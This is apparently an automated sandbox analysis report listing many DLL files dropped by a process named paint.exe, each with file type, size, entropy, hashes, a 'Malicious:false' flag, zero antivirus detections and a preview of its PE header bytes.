                                                                                                                                                                                                                                                              SHA1:5150E7EDD1293E29D2E4D6BB68067374B8A07CE6
                                                                                                                                                                                                                                                              SHA-256:0D0F80CBF476AF5B1C9FD3775E086ED0DFDB510CD0CC208EC1CCB04572396E3E
                                                                                                                                                                                                                                                              SHA-512:B0E02E1F19CFA7DE3693D4D63E404BDB9D15527AC85A6D492DB1128BB695BFFD11BEC33D32F317A7615CB9A820CD14F9F8B182469D65AF2430FFCDBAD4BD7000
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....N7.........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                                              Entropy (8bit):4.606873381830854
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:T0WqhWnWEXCVWQ4mW5ocADB6ZX01k9z3AkprGvV:T0WqhW8VcTR9zJpr4V
                                                                                                                                                                                                                                                              MD5:33BBECE432F8DA57F17BF2E396EBAA58
                                                                                                                                                                                                                                                              SHA1:890DF2DDDFDF3EECCC698312D32407F3E2EC7EB1
                                                                                                                                                                                                                                                              SHA-256:7CF0944901F7F7E0D0B9AD62753FC2FE380461B1CCE8CDC7E9C9867C980E3B0E
                                                                                                                                                                                                                                                              SHA-512:619B684E83546D97FC1D1BC7181AD09C083E880629726EE3AF138A9E4791A6DCF675A8DF65DC20EDBE6465B5F4EAC92A64265DF37E53A5F34F6BE93A5C2A7AE5
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....IL..........." .........0...............................................@...........`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                                              Entropy (8bit):4.65169290018864
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:qzmxD3T4qLWqhW2WJWadJCsVWQ4mW/xNVAv+cQ0GX01k9z3ARoanSwT44:qzQVWqhWTCsiNbZR9zQoUSwTJ
                                                                                                                                                                                                                                                              MD5:EB0978A9213E7F6FDD63B2967F02D999
                                                                                                                                                                                                                                                              SHA1:9833F4134F7AC4766991C918AECE900ACFBF969F
                                                                                                                                                                                                                                                              SHA-256:AB25A1FE836FC68BCB199F1FE565C27D26AF0C390A38DA158E0D8815EFE1103E
                                                                                                                                                                                                                                                              SHA-512:6F268148F959693EE213DB7D3DB136B8E3AD1F80267D8CBD7D5429C021ADACCC9C14424C09D527E181B9C9B5EA41765AFF568B9630E4EB83BFC532E56DFE5B63
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..H...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):26216
                                                                                                                                                                                                                                                              Entropy (8bit):4.866487428274293
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:gaNYPvVX8rFTsCWqhWVWEXCVWQ4mWPJlBLrp0KBQfX01k9z3ALkBw:WPvVX8WqhWiyBRxB+R9z2kBw
                                                                                                                                                                                                                                                              MD5:EFAD0EE0136532E8E8402770A64C71F9
                                                                                                                                                                                                                                                              SHA1:CDA3774FE9781400792D8605869F4E6B08153E55
                                                                                                                                                                                                                                                              SHA-256:3D2C55902385381869DB850B526261DDEB4628B83E690A32B67D2E0936B2C6ED
                                                                                                                                                                                                                                                              SHA-512:69D25EDF0F4C8AC5D77CB5815DFB53EAC7F403DC8D11BFE336A545C19A19FFDE1031FA59019507D119E4570DA0D79B95351EAC697F46024B4E558A0FF6349852
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....(............" .........@...............................................P......z.....`A........................................p................@...............@..h&..............p............................................................................rdata..|........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                                              Entropy (8bit):4.619913450163593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:iDGaWqhWhWJWadJCsVWQ4mWd9afKUSIX01k9z3AEXzAU9:i6aWqhWACs92IR9z5EU9
                                                                                                                                                                                                                                                              MD5:1C58526D681EFE507DEB8F1935C75487
                                                                                                                                                                                                                                                              SHA1:0E6D328FAF3563F2AAE029BC5F2272FB7A742672
                                                                                                                                                                                                                                                              SHA-256:EF13DCE8F71173315DFC64AB839B033AB19A968EE15230E9D4D2C9D558EFEEE2
                                                                                                                                                                                                                                                              SHA-512:8EDB9A0022F417648E2ECE9E22C96E2727976332025C3E7D8F15BCF6D7D97E680D1BF008EB28E2E0BD57787DCBB71D38B2DEB995B8EDC35FA6852AB1D593F3D1
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....RS.........." .........0...............................................@......;.....`A........................................p...L............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):18696
                                                                                                                                                                                                                                                              Entropy (8bit):7.054510010549814
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:384:eVrW1hWbvm0GftpBjzH4m3S9gTlUK3dsl:eVuAViaB/6sl
                                                                                                                                                                                                                                                              MD5:BFFFA7117FD9B1622C66D949BAC3F1D7
                                                                                                                                                                                                                                                              SHA1:402B7B8F8DCFD321B1D12FC85A1EE5137A5569B2
                                                                                                                                                                                                                                                              SHA-256:1EA267A2E6284F17DD548C6F2285E19F7EDB15D6E737A55391140CE5CB95225E
                                                                                                                                                                                                                                                              SHA-512:B319CC7B436B1BE165CDF6FFCAB8A87FE29DE78F7E0B14C8F562BE160481FB5483289BD5956FDC1D8660DA7A3F86D8EEDE35C6CC2B7C3D4C852DECF4B2DCDB7F
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...4.F>.........." .........................................................0............`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                                              Entropy (8bit):4.625331165566263
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:qzWqhWxWJWadJCsVWQ4mW8RJLNVAv+cQ0GX01k9z3ARo8ef3uBJu:qzWqhWwCsjNbZR9zQoEzu
                                                                                                                                                                                                                                                              MD5:E89CDCD4D95CDA04E4ABBA8193A5B492
                                                                                                                                                                                                                                                              SHA1:5C0AEE81F32D7F9EC9F0650239EE58880C9B0337
                                                                                                                                                                                                                                                              SHA-256:1A489E0606484BD71A0D9CB37A1DC6CA8437777B3D67BFC8C0075D0CC59E6238
                                                                                                                                                                                                                                                              SHA-512:55D01E68C8C899E99A3C62C2C36D6BCB1A66FF6ECD2636D2D0157409A1F53A84CE5D6F0C703D5ED47F8E9E2D1C9D2D87CC52585EE624A23D92183062C999B97E
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....Hb..........." .........0...............................................@............`A........................................p...`............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                                              Entropy (8bit):4.737397647066978
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:OdxlZWqhWcWJWadJCsVWQ4mWlhtFyttuX01k9z3A2oD:OdxlZWqhWpCsctkSR9zfoD
                                                                                                                                                                                                                                                              MD5:ACCC640D1B06FB8552FE02F823126FF5
                                                                                                                                                                                                                                                              SHA1:82CCC763D62660BFA8B8A09E566120D469F6AB67
                                                                                                                                                                                                                                                              SHA-256:332BA469AE84AA72EC8CCE2B33781DB1AB81A42ECE5863F7A3CB5A990059594F
                                                                                                                                                                                                                                                              SHA-512:6382302FB7158FC9F2BE790811E5C459C5C441F8CAEE63DF1E09B203B8077A27E023C4C01957B252AC8AC288F8310BCEE5B4DCC1F7FC691458B90CDFAA36DCBE
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....B.l.........." .........0...............................................@.......A....`A........................................p................0...............0..x&..............p............................................................................rdata..|...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                                              Entropy (8bit):4.6569647133331316
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:dwWqhWWWEXCVWQ4mWLnySfKUSIX01k9z3AEXz5SLaDa3:iWqhWJhY2IR9z5YLt3
                                                                                                                                                                                                                                                              MD5:C6024CC04201312F7688A021D25B056D
                                                                                                                                                                                                                                                              SHA1:48A1D01AE8BC90F889FB5F09C0D2A0602EE4B0FD
                                                                                                                                                                                                                                                              SHA-256:8751D30DF554AF08EF42D2FAA0A71ABCF8C7D17CE9E9FF2EA68A4662603EC500
                                                                                                                                                                                                                                                              SHA-512:D86C773416B332945ACBB95CBE90E16730EF8E16B7F3CCD459D7131485760C2F07E95951AEB47C1CF29DE76AFFEB1C21BDF6D8260845E32205FE8411ED5EFA47
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...}.o..........." .........0...............................................@......v.....`A........................................p................0...............0..h&..............p............................................................................rdata..L...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                                              Entropy (8bit):4.882042129450427
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:9TvuBL3BBLAWqhWUWEXCVWQ4iWgdCLVx6RMySX01k9z3AzaXQ+BB:9TvuBL3BaWqhW/WSMR9zqaP
                                                                                                                                                                                                                                                              MD5:1F2A00E72BC8FA2BD887BDB651ED6DE5
                                                                                                                                                                                                                                                              SHA1:04D92E41CE002251CC09C297CF2B38C4263709EA
                                                                                                                                                                                                                                                              SHA-256:9C8A08A7D40B6F697A21054770F1AFA9FFB197F90EF1EEE77C67751DF28B7142
                                                                                                                                                                                                                                                              SHA-512:8CF72DF019F9FC9CD22FF77C37A563652BECEE0708FF5C6F1DA87317F41037909E64DCBDCC43E890C5777E6BCFA4035A27AFC1AEEB0F5DEBA878E3E9AEF7B02A
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....g..........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                                              Entropy (8bit):5.355894399765837
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:384:0naOMw3zdp3bwjGzue9/0jCRrndbnWqhW5lFydVXC4deR9zVj7xR:FOMwBprwjGzue9/0jCRrndbtGydVXC4O
                                                                                                                                                                                                                                                              MD5:724223109E49CB01D61D63A8BE926B8F
                                                                                                                                                                                                                                                              SHA1:072A4D01E01DBBAB7281D9BD3ADD76F9A3C8B23B
                                                                                                                                                                                                                                                              SHA-256:4E975F618DF01A492AE433DFF0DD713774D47568E44C377CEEF9E5B34AAD1210
                                                                                                                                                                                                                                                              SHA-512:19B0065B894DC66C30A602C9464F118E7F84D83010E74457D48E93AACA4422812B093B15247B24D5C398B42EF0319108700543D13F156067B169CCFB4D7B6B7C
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...0.&3.........." .........0...............................................@......L0....`A........................................p................0...............0..h&..............p............................................................................rdata..D...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                                              Entropy (8bit):4.771309314175772
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:L0WqhWTWEXCVWQ4cRWdmjKDUX01k9z3AQyMX/7kn:L0WqhWol1pR9zzDY
                                                                                                                                                                                                                                                              MD5:3C38AAC78B7CE7F94F4916372800E242
                                                                                                                                                                                                                                                              SHA1:C793186BCF8FDB55A1B74568102B4E073F6971D6
                                                                                                                                                                                                                                                              SHA-256:3F81A149BA3862776AF307D5C7FEEF978F258196F0A1BF909DA2D3F440FF954D
                                                                                                                                                                                                                                                              SHA-512:C2746AA4342C6AFFFBD174819440E1BBF4371A7FED29738801C75B49E2F4F94FD6D013E002BAD2AADAFBC477171B8332C8C5579D624684EF1AFBFDE9384B8588
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...`.@f.........." .........0...............................................@......K.....`A........................................p...l............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                                              Entropy (8bit):4.7115212149950185
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:bWqhWUxWJWadJCsVWQ4mW5iFyttuX01k9z3A2EC:bWqhWUwCs8SR9zfEC
                                                                                                                                                                                                                                                              MD5:321A3CA50E80795018D55A19BF799197
                                                                                                                                                                                                                                                              SHA1:DF2D3C95FB4CBB298D255D342F204121D9D7EF7F
                                                                                                                                                                                                                                                              SHA-256:5476DB3A4FECF532F96D48F9802C966FDEF98EC8D89978A79540CB4DB352C15F
                                                                                                                                                                                                                                                              SHA-512:3EC20E1AC39A98CB5F726D8390C2EE3CD4CD0BF118FDDA7271F7604A4946D78778713B675D19DD3E1EC1D6D4D097ABE9CD6D0F76B3A7DFF53CE8D6DBC146870A
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...j............" .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                                              Entropy (8bit):4.893761152454321
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:dEFP2WqhWVWEXCVWQ4mW68vx6RMySX01k9z3AzapOP:eF+WqhWi6gMR9zqa0
                                                                                                                                                                                                                                                              MD5:0462E22F779295446CD0B63E61142CA5
                                                                                                                                                                                                                                                              SHA1:616A325CD5B0971821571B880907CE1B181126AE
                                                                                                                                                                                                                                                              SHA-256:0B6B598EC28A9E3D646F2BB37E1A57A3DDA069A55FBA86333727719585B1886E
                                                                                                                                                                                                                                                              SHA-512:07B34DCA6B3078F7D1E8EDE5C639F697C71210DCF9F05212FD16EB181AB4AC62286BC4A7CE0D84832C17F5916D0224D1E8AAB210CEEFF811FC6724C8845A74FE
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...L.Y..........." .........0...............................................@............`A........................................p...H............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                                              Entropy (8bit):5.231196901820079
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:/Mck1JzX9cKSI0WqhWsWJWadJCsVWQ4mWClLeyttuX01k9z3A2XCJq:Uck1JzNcKSI0WqhWZCsvfSR9zfyk
                                                                                                                                                                                                                                                              MD5:C3632083B312C184CBDD96551FED5519
                                                                                                                                                                                                                                                              SHA1:A93E8E0AF42A144009727D2DECB337F963A9312E
                                                                                                                                                                                                                                                              SHA-256:BE8D78978D81555554786E08CE474F6AF1DE96FCB7FA2F1CE4052BC80C6B2125
                                                                                                                                                                                                                                                              SHA-512:8807C2444A044A3C02EF98CF56013285F07C4A1F7014200A21E20FCB995178BA835C30AC3889311E66BC61641D6226B1FF96331B019C83B6FCC7C87870CCE8C4
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....O.j.........." .........0...............................................@......9&....`A........................................p................0...............0..x&..............p............................................................................rdata..d...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                                              Entropy (8bit):4.799245167892134
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:R0DfIeUWqhWLWJWadJCsVWQ4mWFVyttuX01k9z3A2YHmp:R0DfIeUWqhWiCsLSR9zfYHmp
                                                                                                                                                                                                                                                              MD5:517EB9E2CB671AE49F99173D7F7CE43F
                                                                                                                                                                                                                                                              SHA1:4CCF38FED56166DDBF0B7EFB4F5314C1F7D3B7AB
                                                                                                                                                                                                                                                              SHA-256:57CC66BF0909C430364D35D92B64EB8B6A15DC201765403725FE323F39E8AC54
                                                                                                                                                                                                                                                              SHA-512:492BE2445B10F6BFE6C561C1FC6F5D1AF6D1365B7449BC57A8F073B44AE49C88E66841F5C258B041547FCD33CBDCB4EB9DD3E24F0924DB32720E51651E9286BE
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....#..........." .........0...............................................@.......,....`A........................................p................0...............0..x&..............p............................................................................rdata..\...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                                              Entropy (8bit):4.587063911311469
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:fWqhWeWJWadJCsVWQ4mWMs7DENNVAv+cQ0GX01k9z3ARoIGA/:fWqhWbCs8oNbZR9zQoxS
                                                                                                                                                                                                                                                              MD5:F3FF2D544F5CD9E66BFB8D170B661673
                                                                                                                                                                                                                                                              SHA1:9E18107CFCD89F1BBB7FDAF65234C1DC8E614ADD
                                                                                                                                                                                                                                                              SHA-256:E1C5D8984A674925FA4AFBFE58228BE5323FE5123ABCD17EC4160295875A625F
                                                                                                                                                                                                                                                              SHA-512:184B09C77D079127580EF80EB34BDED0F5E874CEFBE1C5F851D86861E38967B995D859E8491FCC87508930DC06C6BBF02B649B3B489A1B138C51A7D4B4E7AAAD
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......e.........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..P...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                                              Entropy (8bit):4.754374422741657
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:CGeVPWqhWUWJWadJCsVWQ4mWUhSqyttuX01k9z3A2lqn7cq:CGeVPWqhWBCsvoSR9zflBq
                                                                                                                                                                                                                                                              MD5:A0C2DBE0F5E18D1ADD0D1BA22580893B
                                                                                                                                                                                                                                                              SHA1:29624DF37151905467A223486500ED75617A1DFD
                                                                                                                                                                                                                                                              SHA-256:3C29730DF2B28985A30D9C82092A1FAA0CEB7FFC1BD857D1EF6324CF5524802F
                                                                                                                                                                                                                                                              SHA-512:3E627F111196009380D1687E024E6FFB1C0DCF4DCB27F8940F17FEC7EFDD8152FF365B43CB7FDB31DE300955D6C15E40A2C8FB6650A91706D7EA1C5D89319B12
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......Z.........." .........0...............................................@............`A........................................p...<............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                                              Entropy (8bit):4.664553499673792
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:mZyMvr5WqhWAWJWadJCsVWQ4mWWqpNVAv+cQ0GX01k9z3ARo+GZ:mZyMvlWqhWNCsUpNbZR9zQo+GZ
                                                                                                                                                                                                                                                              MD5:2666581584BA60D48716420A6080ABDA
                                                                                                                                                                                                                                                              SHA1:C103F0EA32EBBC50F4C494BCE7595F2B721CB5AD
